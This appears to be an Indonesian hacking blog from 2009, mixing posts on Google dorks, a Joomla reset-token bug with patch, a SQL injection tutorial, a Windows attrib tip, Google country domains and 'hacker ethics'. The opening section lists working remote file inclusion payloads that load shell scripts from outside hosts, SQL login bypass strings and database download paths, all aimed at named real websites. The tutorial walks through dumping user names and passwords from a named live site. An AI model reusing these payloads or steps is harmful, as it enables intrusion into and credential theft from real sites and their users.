!scan index.php?sub= inurl:”il/index.php?sub=*.php”
!scan index.php?id= inurl:”/index.php?id=*.php”
!scan index.php?t= inurl:”/index.php?t=*.php”
!scan index.php?r= inurl:”index.php?r=*.php”
!scan index.php?menu= inurl:”net/index.php?menu=*.php”
!scan index.php?pag= inurl:”com/index.php?pag=*.php”
!scan solpot.html?body= allinurl: “solpot.html?body”
!scan port.php?content= inurl:port.php?content=*.php”
!scan index0.php?show= inurl:index0.php?show=*.php”
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler”
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler”
!scan content.php?page= inurl:”*content.php?page=*.php
Pembahasan:
SEMUA INI DARI SABEN —–>
————————————————
keyword:inurl:”/cart.php?m=”
contoh:http://www.facesbyfelicia.com/store/cart.php?m=view
ganti tulisn cart.php?m=view dengan admin
jadi http://www.facesbyfelicia.com/store/admin
trus login pake sql username : ‘or”=” password :’or”=”
————————————————
keyword inurl:”/modernbill”
contoh:http://billing.ourweb.net/modernbill/
masukin injekannya:include/html/config.php?DIR=http://one-server.us/injek.txt?
jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR=http://one-server.us/injek.txt?
————————————————
keyword:”Powered by SunShop 3.2″ atau: inurl:”/sunshop/index.php?action=”
contoh http://www.dohertysgym.com/sunshop/index.php
ganti kata index.php dengan admin jadi : http://www.dohertysgym.com/sunshop/admin
login pake user: admin pass: ‘or”=’
————————————————
inurl:”modules.php?name=SQuery”
injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
contoh:http://www.dies-world.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
————————————————
google:allinurl:com_galleria
injek:components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://one-server.us/item.txt?
contoh:http://www.a1gpracing.net/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt?
————————————————
google:allinurl:”/auth/lostPassword.php”
contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.php
injek:ldap/authldap.php?includePath=http://one-server.us/item.txt?
jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?includePath=http://one-server.us/item.txt
————————————————
google:intitle:”Multimedia Flash Website Builder”
contoh:www.webdesignhq.com/sitebuilder/index.php
injek:sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
————————————————
gogle:”software 2004-2005 by randshop”
contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php?id=20&katid=32&action=detail
injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
————————————————
keyword;”powered by geeklog”
contoh:http://www.kobe-ch.com/index.php
injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
jadi:http://www.kobe-ch.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
————————————————
google:inurl:”/product.php?printable=” atau “powered by x-cart”
inurl:”/home.php?printable=” ganti tulisan itu semua dengan admin
kekekek biasa sqlnya cari sendiri ya
————————————————
keyword:inurl:”/index. php?option=com_rsgallery”
bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item,txt?
contoh:http://www.pass-my-shotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item.txt?
————————————————
keyword:”Advanced Poll” inurl:/admin/
contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php
bug:common.inc.php?base_path=http://elang13.org/item.txt?
jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php?base_path=http://elang13.org/item.txt?
————————————————
inurl:”powered by cs-cart”
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item/txt?
————————————————
inurl:”/catalogue.php?cat=”
ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas ente ente sekalian nyari sqlnya hak hak hak
inurl:”/DoceboScs” injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://elang13.org/hitam.txt?
inurl:”/DoceboCore” injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:”/DoceboLms” injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:”/DoceboKms” injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:”/DoceboCMS” injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
————————————————
allinurl:”dload.php”
injekan:pafiledb/includes/pafiledb_constants.php?module_root_path=http://elang13.org/hitam.txt?
————————————————
“powered by squirrelcart”
injek : squirrelcart/cart_content.php?cart_isp_root=
————————————————
keyword inurl:/ubbthreads/
injek:addpost_newpoll.php?addpoll=preview&thispath=http://elang13.org/hitam.txt?
————————————————
allinurl:”index.php?target=categories”
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item.txt?
————————————————
google : “Exhibit Engine 1.5 RC 4″
injek:photo_comment.php?toroot=http://elang13.org/item.txt?
————————————————
inurl:”/modules/Forums/
injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/item.txt?
————————————————
allinurl: includes/include_once.php
bug:includes/include_once.php?include_file=http://elang13.org/item.txt?
————————————————
allinurl:/phplivehelper/blank.php
injek:initiate.php?abs_path=hhttp://elang13.org/item.txt?
————————————————
google:”powered by DreamAccount”
injeknya:
auth.cookie.inc.php?da_path=http://elang13.org/item.txt?
auth.header.inc.php?da_path=http://elang13.org/item.txt?
auth.sessions.inc.php?da_path=http://elang13.org/item.txt?
————————————————
ashopKart20/” ganti tulisan yang ada didepannya ama admin/scart.mdb
————————————————
inurl:”//comersus/” ganti /store/xxxx.asp dengan
database/comersus.mdb
————————————————
allinurl:/shop/category.asp/catid=
hapus tuisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses ccnya biasayanya di encrypt
http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp
————————————————
inurl:”/admin/default.asp”
username:admin password:’or”=’
span style=”color: rgb(51, 51, 255);”>————————————————
inurl:”/metacart/”
injek : database/metacart.mdb
————————————————
inurl:”/store/proddetail.asp?prod=”
ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
————————————————
inurl:”/AdminLogin.asp”
login pake sql ini :
usename:1′or’1′=’1
password:1′or’1′=’1
————————————————
inurl:”com_a6mambocredits”
http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt
————————————————
“Welcome to phpMyAdmin” inurl:main.php
————————————————
filetype:sql (”passwd values ****” | “password values ****” | “pass values ****” )
————————————————
inurl:”com_peoplebook”
inurl:”com_comprofiler”

Menampilkan File yang di Hidden

2009-10-14T05:02:00.000+07:00

Ini seh perintah simple aja. Mungkin udah banyak yang tau, tapi gw cuma mau share aja. Buat para master yang berkunjung mohon maaf dengan artikel yang gak ada manfaatnya ini.
Lansung aja deh jangan kebanyakan basa-basi :

   1. tentukan dulu Drive yang akan di unHidden misalnya dalam Flashdisk e:
   2. klik start -> run -> cmd
   3. masuk ke Drive e: dengan perintah e:
   4. ketik perintah attrib -R -S -H /S /D kemudian tekan enter
   5. Tunggu sampai selesai kemudian Drive tersebut di refresh
   6. Insya Allah Folder yang di hidden akan keluar.

Link Situs Google Dunia

2009-10-13T23:22:00.000+07:00

USA (.com) www.google.com
Afghanistan (.com.af) www.google.com.af
American Samoa (.as) www.google.As
Anguilla (.off.ai) www.google.off.ai
Antigua and Barbuda (.com.ag) www.google.com.ag
Argentina (.com.ar) www.google.com.ar
Armenia (.am) www.google.am
Australia (.com.au) www.google.com.au
Austria (.at) www.google.at

Azerbaijan (.az) www.google.az
Bahrain (.com.bh) www.google.com.bh
Bangladesh (.com.bd) www.google.com.bd
Belgium (.be) www.google.be
Belize (.com.bz) www.google.com.bz
Bolivia (.com.bo) www.google.com.bo
Bosnia and Herzegovina (.ba) www.google.ba
Botswana (.co.bw) www.google.co.bw
Brazil (.com.br) www.google.com.br
British Virgin Islands (.vg) www.google.vg
Bulgaria (.bg) www.google.bg
Burundi (.bi) www.google.bi
Canada (.ca) www.google.ca
Chile (.cl) www.google.cl
China (.cn) www.google.cn
Colombia (.com.co) www.google.com.co
Congo, Democratic Republic of the (.cd) www.google.cd
Congo, Republic of the (.cg) www.google.cg
Cook Islands (.co.ck) www.google.co.ck
Costa Rica (.co.cr) www.google.co.cr
Croatia (.hr) www.google.hr
Cuba (.com.cu) www.google.com.cu
Czech Republic (.cz) www.google.cz
Cote dCase Ivoire (.ci) www.google.ci
Denmark (.dk) www.google.dk
Djibouti (.dj) www.google.dj
Dominica (.dm) www.google.dm
Dominican Republic (.com.do) www.google.com.do
Ecuador (.com.ec) www.google.com.ec
Egypt (.com.eg) www.google.com.eg
El Salvador (.com.sv) www.google.com.sv
Estonia (.ee) www.google.ee
Ethiopia (.com.et) www.google.com.et
Fiji (.com.fj) www.google.com.fj
Finland (.fi) www.google.fi
France (.fr) www.google.fr
Gambia (.gm) www.google.gm
Germany (.de) www.google.de
Gibraltar (.com.gi) www.google.com.gi
Greece (.com.gr) www.google.com.gr
Greenland (.gl) www.google.gl
Guatemala (.com.gt) www.google.com.gt
Guernsey (.gg) www.google.gg
Haiti (.ht) www.google.ht
Honduras (.hn) www.google.hn
Hong Kong (.com.hk) www.google.com.hk
Hungary (.hu) www.google.hu
Iceland (.is) www.google.is
India (.co.in) www.google.co.in
Indonesia (.co.id) www.google.co.id
Ireland (.ie) www.google.ie
Isle of Man (.co.im) www.google.co.im
Israel (.co.il) www.google.co.il
Italy (.it) www.google.it
Jamaica (.com.im) www.google.com.im
Japan (.co.jp) www.google.co.jp
Jersey (.co.je) www.google.co.je
Jordan (.jo) www.google.jo
Kazakhstan (.kz) www.google.kz
Kenya (.co.ke) www.google.co.ke
Kyrgyzstan (.kg) www.google.kg
Latvia (.lv) www.google.lv
Lesotho (.co.ls) www.google.co.ls
Libya (.com.ly) www.google.co.ly
Liechtenstein (.li) www.google.li
Lithuania (.lt) www.google.lt
Luxembourg (.lu) www.google.lu
Malawi (.mw) www.google.mw
Malaysia (.com.my) www.google.com.my
Malta (.com.mt) www.google.com.mt
Mauritius (.mu) www.google.mu
Mexico (.com.mx) www.google.com.mx
Micronesia (.fm) www.google.fm
Mongolia (.mn) www.google.mn
Montserrat (.ms) www.google.ms
Morocco (.co.ma) www.google.co.ma
Namibia (.com.na) www.google.com.na
Nepal (.com.np) www.google.com.np
Netherlands (.nl) www.google.nl
New Zealand (.co.nz) www.google.co.nz
Nicaragua (.com.ni) www.google.com.ni
Norfolk Island (.com.nf) www.google.com.nf
Norway (.no) www.google.no
Oman (.com.om) www.google.com.om
Pakistan (.com.pk) www.google.com.pk
Panama (.com.pa) www.google.com.pa
Paraguay (.com.py) www.google.com.py
Peru (.com.pe) www.google.com.pe
Philippines (.com.ph) www.google.com.ph
Pitcairn (.pn) www.google.com.pn
Poland (.pl) www.google.pl
Portugal (.pt) www.google.pt
Puerto Rico (.com.pr) www.google.com.pr
Qatar (.com.qa) www.google.com.qa
Romania (.ro) www.google.ro
Russia (.ru) www.google.ru
Rwanda (.rw) www.google.rw
Saint Helena (.sh) www.google.sh
San Marino (.sm) www.google.sm
Saudi Arabia (.com.sa) www.google.com.sa
Senegal (.sn) www.google.sn
Seychelles (.sc) www.google.sc
Singapore (.com.sg) www.google.com.sg
Slovakia (.sk) www.google.sk
Slovenia (.si) www.google.si
South Africa (.co.za) www.google.co.za
South Korea (.co.kr) www.google.co.kr
Spain (.es) www.google.es
Sri Lanka (.lk) www.google.lk
St.Vincent and the Grenadines (.com.vc) www.google.com.vc
Sweden (.se) www.google.se
Switzerland (.ch) www.google.ch
Taiwan (.com.tw) www.google.com.tw
Tajikistan (.com.tj) www.google.com.tj
Thailand (.co.th) www.google.co.th
The Bahamas (.bs) www.google.bs
Tonga (.to) www.google.to
Trinidad and Tobago (.tt) www.google.tt
Turkey (.com.tr) www.google.com.tr
Turkmenistan (.tm) www.google.tm
U.S. Virgin Islands (.co.vi) www.google.co.vi
Uganda (.co.ug) www.google.co.ug
Ukraine (.com.ua) www.google.com.ua
United Arab Emirates (.ae) www.google.ae
United Kingdom (.co.uk) www.google.co.uk
Uruguay (.com.uy) www.google.com.uy
Uzbekistan (.co.uz) www.google.co.uz
Venezuela (.co.ve) www.google.co.ve
Vietnam (.com.vn) www.google.com.vn
Zambia (.co.zm) www.google.co.zm

Patch Joomla 1.5 Reset Token

2009-10-13T21:33:00.001+07:00

Langsung aja deh gw gak mau banyak omong.
Kalo Lo punya website basis joomla, jangan lupakan hal sekecil reset token.
http://www.target.com/
Apabila kita tambah " index.php?option=com_user&view=reset&layout=confirm " dan muncul Token Box reset password, itu tandanya situs joomla Lo ada bug pada http://www.target.com/components/com_user/models/reset.php
LIHAT UN-PATCHED RESET.PHP

cari code berikut ini pada reset.php :

function confirmReset($token)
 {
  global $mainframe;

  $db = &JFactory::getDBO();
  $db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));

  // Verify the token
  if (!($id = $db->loadResult()))
  {
   $this->setError(JText::_('INVALID_TOKEN'));
   return false;
  }

  // Push the token and user id into the session
  $mainframe->setUserState($this->_namespace.'token', $token);
  $mainframe->setUserState($this->_namespace.'id', $id);

  return true;
 }

Masalah diatas ada pada :

$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)

Jadi jika user memasukkan Single Quote (karakter ‘ ) pada Token box maka query yang terlihat jadi seperti ini :

SELECT id FROM jos_users WHERE block = 0 AND activation = ''

Lihat setelah tanda sama dengan yang terakhir. Tanda petik yang dimasukkan membuatnya menjadi empty quote (kutipan kosong) yang akan “diluluskan” begitu saja untuk menjalankan fungsi password reset.

PATCHING

Untuk mencegah user melakukan penetrasi dengan memasukkan Single Quote pada kotak Token maka Achev cukup menambahkan kode penambal. Kode ini akan membuat apabila ada user yang memasukkan karakter ‘ akan menampilkan pesan Error. Kode-nya seperti ini :

if(strlen($token) != 32) {
 $this->setError(JText::_('Woy Mau Ngapain Lo??? Gw Laporin FBI neh...!'));
 return false;
}

Ternyata Achev ini bisa berbahasa Indonesia dan dia tahu bahwa yang kemarin melakukan defacing terhadap situsnya adalah orang Indonesia. Sehingga dia memakai bahasa Indonesia dalam pesan error-nya (walaupun ancamannya untuk melapor ke FBI rasanya terlalu berlebihan). Pesan tersebut bisa diganti dengan yang lainnya.
Kode tersebut diletakkan dibawah potongan kode :

function confirmReset($token)

 {

  global $mainframe;

Sebagai perbandingan, klik link berikut untuk melihat file reset.php yang udah di-patch oleh Achev.
LIHAT PATCHED RESET.PHP

Tutorial SQLI with Latin

2009-10-13T21:04:00.000+07:00

=========================

--==::VHESCKOT_1601::==--

=========================

Disini gw mau sharing tentang bagaimana tekhnik SQL injection using latin.
Oke sebelumnya tolong siapkan beberapa cemilan,,kopi,,dan rokok A-Mild.

1. Pertama berdoa dulu semoga aja ada bug dan berhasil...!!!

2. Lalu kita cari bug/celah dari web tersebut.

http://www.libertychurch.info/news.php?id=927 >>>> tambahin - or '
http://www.libertychurch.info/news.php?id=-927

Eh ada bug.... (ane lanjutin punya kawan nicknya 0che_aneh)

3. cari orderby nya sampe berapa

http://www.libertychurch.info/news.php?id=-927+order+by+1--
http://www.libertychurch.info/news.php?id=-927+order+by+2--
http://www.libertychurch.info/news.php?id=-927+order+by+7-- >>>>>>> error

4. Lihat di nomor berapa tuh errornya,,kalo error diangka 7 berarti unionnya sampe 6 aja jangan banyak2 nanti muntah....
keluar gede banget tuh angka 4 dan angka 5.....kita mainkan deh
Lihat versinya 5 apa 4...kalo 4 ini tutor terhenti deh...
males tebak-tebakan kalo 4.....

http://www.libertychurch.info/news.php?id=-927+union+all+select+1,2,3,convert(version()+using+latin1),convert(database()+using+latin1),6--

5. Alhamdulillah versi 5,,jadi gak perlu tebak-tebakan....
Langsung aja lihat tablenya....

http://www.libertychurch.info/news.php?id=-927+union+all+select+1,2,3,convert(group_concat(table_name)+using+latin1),convert(database()+using+latin1),6+from%20information_schema.tables%20where%20table_schema=database()--

5. Eh dapet tabelnya tuh.....
eh ada "tb_users"
langsung aje ane encode to hex deh di web andelan ane....
http://www.string-functions.com/string-hex.aspx

6. Abis itu ane liat deh columnnya apa aja.....

http://www.libertychurch.info/news.php?id=-927+union+all+select+1,2,3,convert(group_concat(column_name)+using+latin1),convert(database()+using+latin1),6+from%20information_schema.columns%20where%20table_name=0x74625f7573657273--

7. banyak banget tuh bermunculan yang gak jelas juga....
tanpa basa-basi langsung aje ane liat user dan passnya.

http://www.libertychurch.info/news.php?id=-927+union+all+select+1,2,3,convert(group_concat(user_name,0x3a,user_password)+using+latin1),convert(database()+using+latin1),6+from+tb_users--

eh keluar semua deh...!!!!
yawda deh silahkan diteruskan,, kayaknya sampe situ udah jelas banget...!!!

JAVASCRIPT Efek Teks Matrix

2009-10-13T20:44:00.000+07:00

Mungkin dari kalian ada yang belum tahu tentang javascript. Bagi yang belum tahu apa itu Javascript coba lihat di http://id.wikipedia.org/wiki/JavaScript.
Javascript biasa dipakai dalam sebuah website agar menjadi interaktif dan membuat animasi yang hidup. Masih banyak fungsi dari Javascript selain itu dan bahkan kode Javascript juga sering dimanfaatkan untuk menyebarkan malicious ware. Tapi untuk mula-mula kita akan coba untuk membuat sebuah file HTML dengan kode JS yang akan menampilkan efek teks Matrix yang sederhana.

Berhubung di blog gw ini gw input codingannya error terus tampilannya, maka langsung aje ane dorong ke link temen ane. Langsung aja klik disini.
Selamat mencoba, semoga sukses...!!!

ETIKA HACKER

2009-10-13T20:10:00.000+07:00

Etika Hacker

Memiliki kemampuan mengakses komputer tanpa batasan.
Semua informasi yg diberikan tidak boleh dipungut bayaran apapun. Tidak ada yg boleh disembunyikan, dan di tutup tutupi.
Tidak percaya pada otoritas, artinya memperluas desentralisasi.
Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi, dll.
Mampu berseni dikomputer.
Komputer dapat mengubah hidup menjadi lebih baik.
Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.
Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.
Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.
Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.

Setelah itu, berikut adalah cara main hacker, dalam artian hacker bukan berarti membabibuta menyerang tanpa pikir :

Di atas segalanya, hormati pengetahuan & kebebasan informasi.
Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat. Seperti Bug, dll.
Jangan mengambil keuntungan yang tidak fair dari hack. Semata mata untuk kepuasan sendiri.
Tidak mendistribusikan & mengumpulkan software bajakan. Tampa maksud tertentu.
Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri. Tudak brutal dalam melakukan hacking.
Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metoda yang diperoleh secara cuma cuma, tampa pamrih.
Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack, keculai maksud tertentu.
Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.

Hacker sejati akan selalu bertindak berlandaskan kode etik dan aturan main.